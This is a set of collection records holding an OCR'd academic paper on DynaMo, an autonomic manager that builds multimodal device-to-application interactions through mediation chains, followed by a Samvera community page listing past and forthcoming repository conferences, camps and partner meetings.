"fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 20495, 0.46794]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 20495, 0.86645]], "google_gemma-3-12b-it_contains_pii": [[0, 3958, false], [3958, 6832, null], [6832, 10550, null], [10550, 13699, null], [13699, 16278, null], [16278, 20495, null]], "google_gemma-3-12b-it_is_public_document": [[0, 3958, true], [3958, 6832, null], [6832, 10550, null], [10550, 13699, null], [13699, 16278, null], [16278, 20495, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 20495, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 20495, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 20495, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 20495, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, true], [5000, 20495, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 20495, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 20495, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 20495, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 20495, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 20495, null]], "pdf_page_numbers": [[0, 3958, 1], [3958, 6832, 2], [6832, 10550, 3], [10550, 13699, 4], [13699, 16278, 5], [16278, 20495, 6]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 20495, 0.00515]]}
olmocr_science_pdfs
2024-12-03
2024-12-03
bd9ab80af0443b92a12c0bd52f153aad3acaede7
Towards Autonomic Multimodal Interaction Pierre-Alain Avouac, Laurence Nigay, Philippe Lalanda To cite this version: HAL Id: hal-00748665 https://hal.science/hal-00748665 Submitted on 5 Nov 2012 HAL is a multi-disciplinary open access archive for the deposit and dissemination of scientific research documents, whether they are published or not. The documents may come from teaching and research institutions in France or abroad, or from public or private research centers. L’archive ouverte pluridisciplinaire HAL, est destinée au dépôt et à la diffusion de documents scientifiques de niveau recherche, publiés ou non, émanant des établissements d’enseignement et de recherche français ou étrangers, des laboratoires publics ou privés. Towards Autonomic Multimodal Interaction Pierre-Alain Avouac Grenoble University 220 rue de la chimie 38 000 Grenoble France Pierre-Alain.Avouac@imag.fr Laurence Nigay Grenoble University 220 rue de la chimie 38 000 Grenoble France Laurence.Nigay@imag.fr Philippe Lalanda Grenoble University 220 rue de la chimie 38 000 Grenoble France Philippe.Lalanda@imag.fr ABSTRACT Heterogeneity and dynamism of pervasive environment prevent to build static multimodal interaction. In this paper, we present how we use the autonomic approach to build and maintain adaptable multi-modal interaction. We describes characteristic of adaptation, realized by an autonomic manager that relies on models specified by interaction designers and developers. Finally, an example with a real application and existing devices is explained. Categories and Subject Descriptors H.5.2 [Information Interfaces and Presentation]: User Interfaces – input devices and strategies, interaction styles, user interface management systems (UIMS). D.2.2 [Software Engineering]: Design Tools and Techniques – User interfaces. General Terms Algorithms, Design. Keywords Multimodal interaction, autonomic computing. 1. INTRODUCTION As envisioned by Mark Weiser [6], computers are getting more and more numerous and interconnected. Somehow, they even disappear from the user’s awareness that now tends to reason in terms of services and not in terms of computing elements. One purpose of pervasive computing indeed is to realize this vision of increasingly ubiquitous network-enabled devices. Specifically, it aims at filling our environment with communication-enabled devices in order to assist us in our daily activities. Service-oriented Computing (SOC) has recently emerged and has clearly fostered the domain of pervasive communication-enabled devices [4],[1]. The very purpose of this reuse-based approach is to build applications through the late composition of independent software elements, called services. Services can be implemented within smart devices. They are described and dynamically published by service providers; at runtime they are chosen and invoked by service consumers. This is achieved within a service-oriented architecture (SOA), providing the supporting mechanisms. Service orientation brings in major software qualities. It promotes weak coupling between consumers and providers, reducing dependencies among composition units. Late binding and substitutability improve adaptability. Since a service can be chosen or replaced at runtime, it is easier to improve the way requirements are met. A number of implementations have been proposed in the last years. Web Services (www.w3c.org), for instance, represent a solution of choice for software integration. UPnP (www.upnp.org) and DPWS (Devices Profile for Web Services) are heavily used in pervasive applications in order to implement volatile devices. OSGi (www.osgi.org) and iPOJO (www.ipojo.org) provide advanced dynamic features to many software systems. It is expected that, in the long term, devices will fade into the environment and users will not be aware of their location or their precise nature. There will be no need for complex, specific interfaces. Users will simply express their needs or desires and the environment and the objects in it will configure themselves autonomously. In the midterm, the situation is a bit different. Interactions with smart devices are generally explicit. Users have to engage explicit interaction with devices in order to obtain a service. Effectively interacting with pervasive devices is complicated by several factors. First, an interaction may need several devices. It is then necessary to deal with several sources of heterogeneous data in order to trigger an action. The activity of integrating disparate information sources in a timely fashion is known under the name of mediation. Mediation has been historically used to integrate data stored in IT resources like databases, knowledge bases, file systems, digital libraries or electronic mail systems [7],[8],[3]. It is now also used to allow interoperability between heterogeneous software applications and devices [2]. Another problem is related to the number and variety of smart communication devices that is just exploding! PDAs, smartphones, set-top-boxes, cameras, and electronic appliances can be found in many houses today. As envisioned by Moore’s law, these devices are getting cheaper, smaller and are pervading every aspect of our life. The problem is that this invasion is chaotic: devices use a number of communication protocols and are rarely interoperable. For instance, there are today more than 50 candidate protocols, working groups and standard specifications for home networking already exist (see www.caba.org for an updated list). As a consequence, building consistent interactions based on network enabled devices that spontaneously enter and leave the network turns to be a real challenge. We believe that significant progress is needed along several dimensions. New architectures and techniques are actually... needed in order to seamlessly integrate heterogeneous and changing devices and networks. In this paper, we present an autonomic solution to this problem of multimodal interaction in heterogeneous, dynamic domains. The paper is organized as it follows. Firstly, our autonomic approach is motivated, and adaptation characteristics of our work are described. Secondly, models used to guide adaptation are explained. Finally, a concrete example is provided with emphasis on the autonomic aspect and its coupling with models. 2. AUTONOMIC INTERACTION A multimodal interface enables a user to use more than one device to interact with a system. In the pervasive vision, a user is surrounded by devices that can be seen as resources or as means to trigger an action on the environment. Input devices, like remote controllers or webcams coupled with movement recognition, allow users to express their needs and desires. Other devices, like heating systems or movie players, host application and are actually in charge of fulfilling the users’ needs. Finally, output devices inform the user of the system response: loudspeaker, screen, etc. Our work focus on input multimodality, that is to say on unidirectional communication from input devices to services-based devices. Due to the heterogeneity of environments, no assumption can be made about how a user will interact with an application. Thus, applications and devices are independent. However, interaction designers should be able to add some of their knowledge. Finally, a user should be able to configure some aspect of interaction along its preferences. Therefore, the interaction has to be adaptable. However, doing this adaptation requires deep technical knowledge that users and interaction designers do not have. The need of autonomic emerges from this set of facts. We develop DynaMo (standing for “dynamic modalities”), a software that generates and maintains context-adapted multimodal interactions. General assumptions behind DynaMo are: - An application is a set of tasks that consume data; - A device is a set of sensors that provide data; - Applications and devices are exposed as services, as defined in service-oriented computing. Providing users with multimodal interaction facilities is a hard task where a number of requirements have to be met. A user generally has preferences that have to be considered carefully. A user does not want to deal with low level details. For instance, he/she neither wants to notify the system that a device is no more usable nor creates a whole interaction. Also, a user may want to prevent a device to be used for some task, or give a policy in order to guide the interaction generation along his or her preferences. Providing multimodal interaction facilities is even made harder in pervasive environments, characterized by their heterogeneity and dynamicity. More precisely, the following aspects have to be taken into account: - The environment (which devices and services are accessible at a given point in time?); - Information about devices and services (how do services and devices interact?); - User preferences (which policy should follow an interaction?). In our work, we propose to use an autonomic manager in order to generate (and maintain) an interaction. Because carrying data from input devices to services can be seen as a mediation problem, we have decided to implement an interaction through a mediation chain. In this approach, the autonomic manager has thus three kinds of input, which will be detailed here after, and its output is a mediation chain. The autonomic manager is reactive: when a modification occurs in the input elements, it computes a new chain or adapts the current one. ![Figure 1. Global approach](image) In order to better understand the adaptations that have to be made by the autonomic manager, we present here the objects to adapt, the realization issues, the temporal characteristics and the interaction concerns as suggested in [5]. The object to adapt is a mediation chain that is made of specific elements called mediators. Adaptations are done globally, at the chain level. The impact is low from the system’s point of view: because the mediation chain is in a well-defined place in the architecture, there is no side effect elsewhere. The mediation chain is decoupled from the autonomic manager. The device and application are not aware of the mediation chain, so they do not see any change. Currently, the time cost is not negligible from the user point of view (about 3 seconds). It will be really negligible when the low level anomaly is spotted: less that one second is aimed. The impact on the user can be huge: a new interaction takes place, the old interaction is no longer available. Of course, the adaptation is done in order to enhance the user communicative capabilities: a new interaction is built due to new communication possibilities. As a conclusion, the adaptation is strong because a part of architecture is modified. The realization issue is split into approach and type. The decision-making is static: a user can choose a policy at runtime, but he/she cannot modify the effect of a rule without recompiling. Same thing for the models used to generate an interaction: models can be modified at runtime, but the decision-making that relies on these models cannot be changed at runtime. These statements have to be mitigated: DynaMo itself is built with the dynamic service approach. In theory, deciding processes can be changed at runtime but that has not been investigated. The adaptation is external: the adaptable mediation chain is decoupled from the autonomic manager. This separation eases the evolution of the mediation chain in one hand, and the evolution of autonomic manager in the other hand. The adaptation is realized without learning from the user inputs. However, several cases would obviously leverage the learning. For example, if a button is never used by a user, DynaMo could propose to bind this button to another function. Usage of autonomic architecture will ease the machine learning process because sensing and effecting are already done. The adaptation is model-based: description of devices and applications resides in model. These models have to be conformed to a meta-model; that is specific to interaction domain. The temporal characteristics are split into reactive/proactive adaptation and continuous/adaptive monitoring. The adaptation is reactive: a change in the environment potentially trigger the generation of the new interaction. Same thing occurs for rules: if the user chooses another rule, a new interaction is generated. No assumption can be done about the evolution of the environment. Hence, the monitoring is continuous. Finally, interaction concerns are split into human involvement, trust and interoperability. The user is involved when he/she chooses a policy rule. Moreover, the user can choose which application she or he wants to control through the multimodal interaction. By contrast, changes in the accessible device set do not required user’s involvement. The trust is obtained by different ways. First, used algorithms are deterministic: if autonomic manager inputs are the same, the provided mediation chain is the same. Then, appearance and disappearance of services and devices are notified to the user. Finally, a simple mechanism is used, allowing that if a button has a validation function, it will be used for validation, whatever the application deals with. The main lack concerns the observability by a user of an interaction. Currently, a user cannot easily know what task is bound to a sensor. Some works is being done to improve this. Along this presentation, we have underscored some advantages of our modeling approach. The next section presents models that can be specified by stakeholders. 3. MODELS The autonomic manager needs some information to generate a useful interaction. We have decided to store most of the necessary information in models. Two kinds of model are handled: proxy models and interaction models. This separation has been done in order to target the two different stakeholders: developers and interaction designers. A developer is in charge of developing both device and application proxies. She/he has to provide one model for each proxy. A proxy model contains information about the discovering process that is used by the discovery manager. From this information, the discovery manager is able to track the concerned device or application and start its corresponding proxy. The model contains other information relative to how send to data to a proxy, or receive data form a proxy, the especially the data type. From this information, the autonomic manager can connect the endpoints of a mediation chain to the proxies. If a data type is a number (float or integer), the interval has to be provided. An interval is composed of a lowest bound and an upper bound. This information enables the autonomic manager to adapt intervals at runtime by inserting an adaptor between incompatible intervals. For example, if a device provides numbers in the interval $[-100, +100]$, and a connected application task handles numbers in the interval $[0, +100]$, the inserted adaptor does a linear transformation for each value between these two intervals. Figure 2 shows the meta-model of expected proxy models. An interaction designer is an expert: she/he is able to detect what is the best way to interact with an application or what is the best way a device can be used. She/he may provide one or several interaction models for each proxy model. Because these models only depend on one proxy, they describe only a partial interaction that is completed by the autonomic manager that generates a full interaction at runtime. Interaction models contain information about data semantics, data processing and data path. Without knowing the semantics of a data, the autonomic manager is only able to reason about its type. That prevents it from generating a broken interaction caused by incompatible data types. Guided by semantics, the autonomic manager is able to generate a more useful interaction. Data processing is important: the interaction designer is able to enhance an interaction by adding tasks to an application, synchronizing data and so on. For example, if a media player application proposes a task to control the sound volume trough a number, then the interaction designer can add a task that mute the volume. A data path is the succeeding functions that a data will pass through. Figure 3 shows a detail of the general meta-model about partial interactions. Freely defining semantics does not make sense because the autonomic manager needs to match defined meanings in the different interaction models. Several interaction classes have been predefined. An interaction class defines several meanings that make sense together. An interaction model references one interaction class, so only the meanings of this class can be attached to data of this model. In order to ease the data processing definition, a predefined library of processing functions is provided. The interaction designer declares which function has to be used, and provides a configuration for the function. For example, a triggering function sends an event as soon as it receives a value greater than a configured ceiling. These functions are specific to the interaction domain. They have been tailored with reuse concerns in mind. The functions are implemented by components. Thus, the interaction designer specifies a partial interaction by declaring which base component to use, configuring them and binding their ports together. At this stage of specification, data types can generally be ignored because the autonomic manager will be able to runtime to infer each port data type. This inference leads to complete the component configuration, and add data type converting component if necessary. Specifying a partial interaction by assembling and configuring several domain specialized components eases the interaction designer work. This approach maximizes the reusability by providing generic components, lowers the difficulties by hiding implementations details, and facilitates the implementation of autonomic manager because the abstraction gap between components and mediators is narrow. Figure 4. General meta-model used by the autonomic manager These models are conformed through instantiation to their corresponding meta-model. The autonomic manager relies on a general meta-model that integrates these two meta-models. Figure 4 shows an excerpt of this general meta-model, notably relation between proxies, partial interactions and component library. We have presented two main meta-models used by DynaMo. The next section provides example of some model specifications. 4. EXAMPLE The following example shows how the autonomic manager deals with two devices and one application. The application is a media player software, namely VLC. The first device is a Blu-ray remote control, namely BD Remote Control (or BDRC). The second device is a controller for a video game console, namely Wii Remote (or Wiimote). VLC can receive commands through an inter-process communication system, namely D-Bus. The two devices use the Bluetooth protocol to send data. The Figure 5 shows the proxy models. Only an excerpt of actual proxy and interaction model are shown: VLC proxy model has stop, next and previous tasks, etc. In the autonomic manager point of view, it receives a discovery notification about VLC, hence it download the VLC binary proxy from the repository and start it. Since no device is discovered, no mediation chain is generated. Then, it receives a discovery notification about the BDRC. It starts the BDRC proxy. Now, a mediation chain can be generated. Amongst the interaction models of BDRC and VLC, it selects the two that have the same interaction class. It instantiates the components declared in the interaction models, and binds mediator of each interaction if their meanings matches. When Alice pushes the pause button, a data is sent by the BDRC. The proxy gets the data and passes an event to a mediator. In this mediator, we could eventually notify the autonomic manager that the button has been used. The event follows a path through the mediation chain, and arrives in the pause port of the VLC proxy. The proxy calls the pause task on VLC. As soon as the autonomic manager is notified of the Wiimote discovery, it starts the proxy. Any interaction class of VLC and Wiimote matches each others. The autonomic manager generates the same mediation chain plus a part that connect the Wiimote proxy to the VLC proxy. This new part is created only from information about data type. Finally, when the BDRC runs --- 1 Official website: http://www.videolan.org/vlc/ 4 Official website: http://www.bluetooth.com/ out of energy, the autonomic manager is notified, and generates the same mediation chain without the BDRC part. Excerpts of partial interaction models are shown in the Figure 6. The matching interaction class is “MediaPlayer”. Its meaning set contains “pause” and “mute”. Since only components can be declared in the interaction models, attaching a meaning is done by declaring an “identity” component, and by attaching a meaning to a port of the component. Since same meanings are employed in each model, the autonomic manager is able to bind directly these ports. The generated mediation chain is shown in the Figure 7. The identity components declared in the interaction models are not apparent in the mediation chain. Since the “identity” component does not modify data that pass through it. They are removed at the end of the generation process. The Wiimote proxy model does not have an interaction model that use the “MediaPlayer” interaction class. This lack of information results in random bindings between Wiimote proxy ports and VLC ports. Of course, the autonomic manager verifies the data type compatibility. Moreover, it distributed the bindings between application tasks, to prevent that only one task is bound to all sensors. 5. Conclusion In this paper, we have shown how we leverage autonomic computing principle to build context-adaptable multimodal interactions. Heterogeneity and dynamicity of pervasive environments are handled. We have created DynaMo, a software that generates and maintains interactions. Generation and maintenance are realized by an autonomic manager, which reasons with models. At the conception time, these models are specified by developers or interaction designers, according to their knowledge. At runtime, a user is able to choose a policy to guides interaction building towards its preference. An example with two existing devices and a real application has been explained. Our overall architecture has already enables to adapt an interaction to the context. Some interesting works remain, that should easily take place in this architecture. For example, collecting data inside a mediation chain should enable DynaMo to analyze user’s usage of interactions, in order to propose new adaptations to the user. 6. REFERENCES
{"Source-Url": "https://hal.science/hal-00748665/file/Avouac-Nigay-Lalanda_MAASC2011.pdf", "len_cl100k_base": 4454, "olmocr-version": "0.1.53", "pdf-total-pages": 6, "total-fallback-pages": 0, "total-input-tokens": 20757, "total-output-tokens": 5351, "length": "2e12", "weborganizer": {"__label__adult": 0.00035381317138671875, "__label__art_design": 0.00112152099609375, "__label__crime_law": 0.0003304481506347656, "__label__education_jobs": 0.0006556510925292969, "__label__entertainment": 0.00014102458953857422, "__label__fashion_beauty": 0.0001957416534423828, "__label__finance_business": 0.00020420551300048828, "__label__food_dining": 0.000385284423828125, "__label__games": 0.0005636215209960938, "__label__hardware": 0.0020542144775390625, "__label__health": 0.0006074905395507812, "__label__history": 0.00034618377685546875, "__label__home_hobbies": 9.244680404663086e-05, "__label__industrial": 0.0004150867462158203, "__label__literature": 0.00040030479431152344, "__label__politics": 0.00027823448181152344, "__label__religion": 0.000568389892578125, "__label__science_tech": 0.11761474609375, "__label__social_life": 9.644031524658204e-05, "__label__software": 0.0167236328125, "__label__software_dev": 0.85595703125, "__label__sports_fitness": 0.0002715587615966797, "__label__transportation": 0.0005736351013183594, "__label__travel": 0.0002363920211791992}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 24645, 0.0365]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 24645, 0.55249]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 24645, 0.91417]], "google_gemma-3-12b-it_contains_pii": [[0, 1004, false], [1004, 6125, null], [6125, 11758, null], [11758, 17349, null], [17349, 21148, null], [21148, 24645, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1004, true], [1004, 6125, null], [6125, 11758, null], [11758, 17349, null], [17349, 21148, null], [21148, 24645, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 24645, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 24645, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 24645, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 24645, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 24645, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 24645, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 24645, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 24645, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 24645, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 24645, null]], "pdf_page_numbers": [[0, 1004, 1], [1004, 6125, 2], [6125, 11758, 3], [11758, 17349, 4], [17349, 21148, 5], [21148, 24645, 6]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 24645, 0.0]]}
olmocr_science_pdfs
2024-12-09
2024-12-09
bd24ba81813fca524faaf17cb39af59dce15cadd
[REMOVED]
{"Source-Url": "http://www.researchgate.net/profile/Michal_Chromiak/publication/262411400_The_linkup_data_structure_for_heterogeneous_data_integration_platform/links/0c960538ca4ea39934000000.pdf", "len_cl100k_base": 5250, "olmocr-version": "0.1.42", "pdf-total-pages": 12, "total-fallback-pages": 0, "total-input-tokens": 28607, "total-output-tokens": 6893, "length": "2e12", "weborganizer": {"__label__adult": 0.00033402442932128906, "__label__art_design": 0.0006809234619140625, "__label__crime_law": 0.00048422813415527344, "__label__education_jobs": 0.0013065338134765625, "__label__entertainment": 9.644031524658204e-05, "__label__fashion_beauty": 0.00018274784088134768, "__label__finance_business": 0.0006132125854492188, "__label__food_dining": 0.0004088878631591797, "__label__games": 0.0004198551177978515, "__label__hardware": 0.0015583038330078125, "__label__health": 0.0010023117065429688, "__label__history": 0.0004489421844482422, "__label__home_hobbies": 0.00012540817260742188, "__label__industrial": 0.0007600784301757812, "__label__literature": 0.0003795623779296875, "__label__politics": 0.00028705596923828125, "__label__religion": 0.0005474090576171875, "__label__science_tech": 0.26708984375, "__label__social_life": 0.00012063980102539062, "__label__software": 0.02978515625, "__label__software_dev": 0.6923828125, "__label__sports_fitness": 0.0002193450927734375, "__label__transportation": 0.0005497932434082031, "__label__travel": 0.0002275705337524414}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 29624, 0.02991]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 29624, 0.42241]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 29624, 0.91511]], "google_gemma-3-12b-it_contains_pii": [[0, 2547, false], [2547, 5863, null], [5863, 8986, null], [8986, 12363, null], [12363, 15881, null], [15881, 16987, null], [16987, 19337, null], [19337, 21174, null], [21174, 23071, null], [23071, 24594, null], [24594, 27164, null], [27164, 29624, null]], "google_gemma-3-12b-it_is_public_document": [[0, 2547, true], [2547, 5863, null], [5863, 8986, null], [8986, 12363, null], [12363, 15881, null], [15881, 16987, null], [16987, 19337, null], [19337, 21174, null], [21174, 23071, null], [23071, 24594, null], [24594, 27164, null], [27164, 29624, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 29624, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 29624, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 29624, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 29624, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 29624, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 29624, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 29624, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 29624, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 29624, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 29624, null]], "pdf_page_numbers": [[0, 2547, 1], [2547, 5863, 2], [5863, 8986, 3], [8986, 12363, 4], [12363, 15881, 5], [15881, 16987, 6], [16987, 19337, 7], [19337, 21174, 8], [21174, 23071, 9], [23071, 24594, 10], [24594, 27164, 11], [27164, 29624, 12]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 29624, 0.0]]}
olmocr_science_pdfs
2024-11-22
2024-11-22
3b24ef746ed528281a06e1f3c3c0b36a21fa9f86
Events, presentations and articles For Partner meetings agendas and notes, see Samvera Partner Meetings For the Samvera full Samvera Meetings and Events Diary see Samvera Events Calendar See also Related Conferences for a list of other conferences taking place where a Samvera presence might be desirable (and/or to avoid scheduling conflicts) - Forthcoming Events - Past events (with presentations if available) - Related Conferences Forthcoming Events One or more members of the Samvera Community will be attending the following events. Events listed with the Samvera icon are organised by or on behalf of Samvera, those labelled were organized by or on behalf of Hydra (our previous name). Samvera Virtual Connect 2020 14-15 May 2020 | Online PASIG Postponed to 22-24 September 2020 | Biblioteca Digital Memoria de Madrid, Spain Open Repositories 2020 Postponed to 2021 | Stellenbosch University, South Africa Hyrax & Hyku User Workshop 6-7 August 2020 | Notch8, San Diego, CA Intro Samvera Camp 29 September - 2 October 2020 | San Diego Samvera Developer Congress 16 - 18 November 2020 | Virtual | Now virtual and moved to November due to the COVID-19 disruption Samvera Partner meeting 26 October 2020 | UC Santa Barbara Library | CANCELLED due to the COVID-19 disruption Arrangements will be made to replace this with a virtual meeting. Samvera Connect 2020 27 - 30 October 2020 | Hilton Santa Barbara Beachfront Resort, Santa Barbara, CA | CANCELLED due to the COVID-19 disruption Arrangements will be made to replace this with a virtual meeting. Open Repositories 2021 31 May - 3 June 2021 | Stellenbosch University, South Africa --- Past events (with presentations if available) **Samvera Partner meeting** 27-28 April 2020 | On-line **Introductory Samvera Camp** 14-17 April 2020 | University of North Carolina at Chapel Hill CANCELLED due to COVID-19 emergency **Code4Lib 2020** 8-11 March 2020 | Westin Hotel, Pittsburgh **Solar Vortex - Samvera Developer Congress** 22-24 January 2020 | UC San Diego **CNI Fall 2019 Membership Meeting** 9-10 December 2019 | Omni Shoreham Hotel Washington, DC **Samvera Connect 2019** 22-25 October 2019 | Washington University in St Louis, MO **Samvera Developer Congress** 21 October 2019 | Washington University in St Louis **Samvera Partner meeting** 21 October 2019 | Washington University in St Louis **2019 DLF Forum** 13-17 October 2019 | Tampa, Florida **Samvera European Regional Group** Notch8 Hyrax and Hyku User Workshop 26-27 September | San Diego, CA Linked Data working meeting 24-27 September | Stanford University Libraries Samvera Camp (introductory) 9-12 September 2019 | UCLA 2019 IIIF Conference 24-28 June 2019 | Göttingen, Germany Open Repositories 2019 10-13 June 2019 | Universität Hamburg, Hamburg, Germany Samvera West Coast Regional Meeting 23 May | UC San Diego Samvera Partner meeting 29-30 April 2019 | IUPUI, Indianapolis Samvera Virtual Connect 2019 23-24 April 2019 | Online Samvera European Regional Group 28 March 2019 | University of Oxford LDCX Invitation only 25-27 March 2019 | Stanford University Samvera European Regional Group 13 December 2018 | Senate House, University of London CNI Fall 2018 Membership meeting 10-11 December 2018 | Washington DC 2018 DLF Forum 14-18 October 2018 | Las Vegas Samvera Connect 2018 9-12 October 2018 | University of Utah, Salt Lake City Samvera Partner meeting 8 October 2018 | University of Utah, Salt Lake City Sandy Metz/PODD II 3-5 October 2018 | Durham, NC Samvera Camp 24-27 September 2018 | Durham, NC Registration: https://samveracamp-duke2018.eventbrite.com Samvera European Regional Group 20 September 2018 | Senate House, University of London Samvera Virtual Connect 2018 11 July 2018 | On-line: full details at the link above Repository Fringe 2-3 July 2018 | Royal Society of Edinburgh Open Repositories 2018 4-7 June 2018 | Montana State University, Bozeman, Montana - Samvera workshop for OR18: Presentation **Advanced Samvera Camp** 7-9 May 2018 | Minneapolis, MN **Samvera Camp** 23-26 April 2018 | Portland, Oregon **Samvera European Regional Group** 19 April 2018 | Senate House, University of London **Samvera Developers' Congress** 29-30 March 2018 | Stanford University **Samvera Partner meeting** 29-30 March 2018 | Stanford University **LDCX** Invitation only 26-28 March 2018 | Stanford University **Samvera West Coast Regional meeting** 16 March 2018 | Henry Madden Library, Fresno State in Fresno, CA **Samvera Europe meeting** 14 December 2017 | LSE, London **Samvera Connect 2017** 6-9 November 2017 | Evanston, IL **Fedora and Samvera Camp** 4-8 September | University of Oxford, UK **Samvera European Regional Group** 27 July 2017 | LSE, London **Samvera Virtual Connect 2017** Open Repositories 2017 26-29 June 2017 | Brisbane, Australia Advanced Hydra Camp 8-10 May 2017 | Minneapolis, MN Hydra Camp 17-20 April 2017 | Emory University Hydra Developers’ congress 30-31 March 2017 | Stanford University Hydra Partner meeting 30-31 March 2017 | Stanford University LDCX Invitation-only event 27-29 March 2017 | Stanford University West Coast Regional Meeting 10 February 2017 | UC Santa Cruz Hydra Connect 2016 3-6 October 2016 | Boston, MA Penn State developer event 19-23 September 2016 | State College, PA Archivematica Camp 24-26 August 2016 | University of Michigan School of Information Hydra Virtual Connect 2016 7 July 2016 | On-line: full details at the link above Open Repositories 2016 13-16 June, 2016 | Dublin, Ireland Annual open source conference for the repository community Hydra Developers’ congress May 2016 | University of Michigan, Ann Arbor Hydra Developers’ congress 24-25 March 2016 | Stanford University Hydra Power Steering meeting Invitation-only event 24-25 March 2016 | Stanford University LDCX Invitation-only event 21-23 March 2016 | Stanford University West Coast Regional Meeting 26 February 2016 | UCSB Hydra Camp 22-25 February 2016 | UCSB Hydra Developers’ congress 3-5 February 2016 | UCSD Hydra Connect 2015 21-24 September, 2015 | Minneapolis, Minnesota Open Repositories 2015 8-11 June, 2015 | Indianapolis, Indiana Annual open source conference for the repository community List of Hydra-related presentations etc at OR2015 Hydra Northeast (US) Regional Meeting 7 May 2015 | Brown University, Providence, Rhode Island Hydra Europe Symposium 2015 23-24 April 2015 | London School of Economics and Political Science (LSE), London Hydra Camp London 20-23 April 2015 | London School of Economics and Political Science (LSE), London Hydra Developers’ congress 26-27 March 2015 | Stanford University Hydra Power Steering meeting Invitation-only event 26-27 March 2015 | Stanford University LAMDevConX Invitation-only event 23-25 March 2015 | Stanford University Hydra: many heads, many connections. Enriching Fedora Repositories with ORCID (slides and recording) 2 April 2015 | Duraspace Hot Topics Series: Integrating ORCID Persistent Identifiers with DSpace, Fedora and VIVO Advanced Blacklight Workshop 13 March 2015 | Yale University, New Haven, Connecticut Hydra Camp 9-12 March 2015 | Yale University, New Haven, Connecticut Post-Code4Lib Hydra Developers' meeting 12-13 February 2015 | UoPDX Library, Portland, Oregon Code4Lib 9-12 February 2015 | Portland Hilton (Portland, OR) a. RailsBridge (Carolyn Cole) b. Intro to Blacklight (Justin Coyne, Mark Bussey, Jessie Keck) c. GeoHydra / GeoBlacklight (Jack Reed, Darren Hardy, Bess Sadler) d. Dive into Hydra (Possibly with a focus on installing Worthwhile) (Justin Coyne, Mark Bussey, Bess Sadler) e. Orienting newcomers and/or Q&A - possible times 10th International Digital Curation Conference (IDCC) 9-12 February 2015 | Royal College of General Practitioners, 30 Euston Square (London, UK) a. Meeting institutional needs for digital curation through shared endeavour: the application of Hydra/Fedora at the University of Hull (Chris Awre) CNI Fall Member Meeting 8-9 December 2014 | Washington DC - Digital Repository Development at Yale Library, from Michael Dula, CTO of Yale Library DLF Forum 2014 27-29 October 2014 | Atlanta, Georgia There is a wealth of Hydra and Hydra-related content at DLF this year. If you won't be able to make it to Hydra Connect 2 (Cleveland, Sept 30-Oct 2), or if you want to carry on the conversation with the broader community, you should consider booking early to DLF: they tend to fill up relatively early. - Hydra Installfest: Monday, October 27, 1:30-3:30pm, Salons 1,2,3 - Developing With Hydra: Tuesday, October 28, 1:30-3:30pm, Salons 1,2,3 - DevOps for Digital Repositories - Sustaining Open Source Software - The Future of Fedora: Update on Fedora 4 - Avalon Media System: Implementation and Community - Spotlight: A Self-Service Tool for Showcasing Digital Collections - Placing the IR Within the User's Workflow: Connecting Hydra-based Repositories with Zotero 